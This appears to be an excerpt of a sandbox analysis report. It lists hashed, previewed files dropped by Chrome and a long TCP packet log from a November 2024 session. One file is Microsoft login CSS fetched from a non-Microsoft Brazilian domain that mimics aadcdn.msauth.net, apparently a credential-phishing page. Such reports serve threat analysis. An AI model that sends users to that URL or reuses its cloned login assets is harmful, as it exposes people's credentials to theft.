                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (46599)
                                                  Category:dropped
                                                  Size (bytes):142378
                                                  Entropy (8bit):5.430493353312546
                                                  Encrypted:false
                                                  SSDEEP:1536:Py0DWgSr6fTPRUbx3XCg/MJA5NOii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGl:qgD1g/Mq5L9EveUynbBwsccuA
                                                  MD5:80D06E1B20E65B4FD1745946BF94FB7D
                                                  SHA1:934D05628A9F0373887ED0F8CDADC4CA675F5FD9
                                                  SHA-256:ACCE6D727B0D1C84F09C5757643A0560D2238A5EA731069A48AECC8E0393810D
                                                  SHA-512:5C47F6F8539FD31BE4A5FAD078482D6BFC31F997EDD4CFFC456E6B16CCBF2D4AE2BB1AF5CA4A1741F46BD3195F8331A1B644C686AF4D44478ED110D4EDB117F3
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                  Category:dropped
                                                  Size (bytes):621
                                                  Entropy (8bit):7.673946009263606
                                                  Encrypted:false
                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113378
                                                  Category:downloaded
                                                  Size (bytes):20400
                                                  Entropy (8bit):7.980289584022803
                                                  Encrypted:false
                                                  SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGGwDO8Ua:8pmm7ZFM+ObGGUIjN5PJV3PDDUa
                                                  MD5:F0DE9A98DBDFA8C02742CE6D92FB2524
                                                  SHA1:CDEC682AEB9E39EDCCC2374DAB26F04DB754A8B5
                                                  SHA-256:FAF4294F27A542B0F9EA2A7CB2711529AB027CD84A5F5BADFAE752100855E6BE
                                                  SHA-512:856FC9AB199997E69A9487372BC0083564F7115B3E0678CF1D542B9864E9A88D5FFB85697FD93538DC9439071E3BCD4B8BCCBFC610E1A45DE104D6362D8ADCD9
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://documerger.afua.com.br/aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                                  Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                  No static file info
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 27, 2024 18:09:17.534933090 CET49674443192.168.2.6173.222.162.64
                                                  Nov 27, 2024 18:09:17.534934044 CET49673443192.168.2.6173.222.162.64
                                                  Nov 27, 2024 18:09:17.784972906 CET49672443192.168.2.6173.222.162.64
                                                  Nov 27, 2024 18:09:27.143168926 CET49673443192.168.2.6173.222.162.64
                                                  Nov 27, 2024 18:09:27.143285990 CET49674443192.168.2.6173.222.162.64
                                                  Nov 27, 2024 18:09:27.392318010 CET49672443192.168.2.6173.222.162.64
                                                  Nov 27, 2024 18:09:29.209862947 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:29.209903955 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:29.210042953 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:29.210293055 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:29.210306883 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:29.991758108 CET44349698173.222.162.64192.168.2.6
                                                  Nov 27, 2024 18:09:29.991961956 CET49698443192.168.2.6173.222.162.64
                                                  Nov 27, 2024 18:09:30.012900114 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:30.012948036 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:30.013207912 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:30.014858007 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:30.014882088 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:30.402100086 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:30.402137041 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:30.402271986 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:30.402590036 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:30.402602911 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:30.967577934 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:30.967863083 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:30.967874050 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:30.968889952 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:30.968950033 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:30.970155954 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:30.970218897 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:31.018439054 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:31.018451929 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:31.066998959 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:31.522573948 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:31.522654057 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:31.530689001 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:31.530709982 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:31.530953884 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:31.572091103 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:31.615355968 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:31.687553883 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:31.687638998 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:31.687732935 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:31.687953949 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:31.688004017 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:31.688057899 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:31.688278913 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:31.688302994 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:31.688448906 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:31.688462973 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:32.080744028 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:32.080811024 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:32.080915928 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:32.159409046 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:32.159446955 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:32.159492016 CET49707443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:32.159508944 CET44349707184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:32.202917099 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:32.202939034 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:32.203005075 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:32.203315973 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:32.203329086 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:32.395493031 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.395565987 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:32.398092031 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:32.398103952 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.398391962 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.407567978 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:32.455333948 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.903022051 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.903050900 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.903065920 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.903130054 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:32.903158903 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:32.903537035 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.105550051 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.105575085 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.105643988 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.105685949 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.105737925 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.132158041 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.132498980 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.132524967 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.133555889 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.133613110 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.137954950 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.138017893 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.138139963 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.138149977 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.153381109 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.153398037 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.153466940 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.153484106 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.153538942 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.183284044 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.291340113 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.291374922 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.291418076 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.291434050 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.291470051 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.291682005 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.331149101 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.331176043 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.331233978 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.331243992 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.331293106 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.351586103 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.351872921 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.351957083 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.352812052 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.352835894 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.352885962 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.352906942 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.352942944 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.352960110 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.352991104 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.353060961 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.353585958 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.353657961 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.371973991 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.371989012 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.372060061 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.372068882 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.372126102 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.395278931 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.395308018 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.441359043 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.570594072 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.570602894 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.570655107 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.570732117 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.570741892 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.570837975 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.583162069 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.583184004 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.583245039 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.583262920 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.583300114 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.593703985 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.593719959 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.593806982 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.593822956 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.593961000 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.606143951 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.606162071 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.606340885 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.606357098 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.610436916 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.618608952 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.618627071 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.618917942 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.618927956 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.619240046 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.629889965 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.629908085 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.630028009 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.630028009 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.630037069 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.630167007 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.824732065 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.824831009 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.824867964 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.824934959 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.824980021 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.825028896 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.847105026 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.847194910 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.847229958 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.849394083 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.849394083 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.850347042 CET49708443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.850363970 CET4434970813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.872035027 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.894309044 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.894310951 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.894340038 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.894351006 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.896564960 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.896565914 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.896573067 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.896574974 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.896631956 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.896637917 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.896676064 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.896677017 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897291899 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897291899 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897303104 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.897325993 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.897454023 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897454977 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897464037 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.897464991 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.897490025 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897612095 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897617102 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:33.897619963 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.897624016 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:33.906326056 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:33.907638073 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:33.907639027 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:33.907665968 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:33.907893896 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:33.911338091 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:33.943737030 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.943769932 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.943787098 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:33.943949938 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.943949938 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:33.959371090 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:34.021995068 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.022006989 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.022398949 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.055051088 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.055061102 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.055695057 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.080354929 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.080363989 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.080818892 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.128931046 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.128945112 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.129523039 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.203284979 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.203296900 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.203939915 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.221628904 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.224494934 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.244734049 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.246351957 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.260823965 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.260914087 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.273139000 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.278354883 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.283126116 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.286356926 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.295964956 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.298362970 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.393935919 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.394362926 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.401938915 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.402136087 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.414731026 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.415638924 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.424243927 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.426371098 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.433610916 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.434364080 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.446043015 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.446213961 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.455390930 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.458374023 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.463773012 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.466372013 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.474227905 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.474365950 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.480345011 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.481441975 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.486403942 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.489448071 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.505867004 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.506372929 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.524429083 CET44349711184.28.90.27192.168.2.6
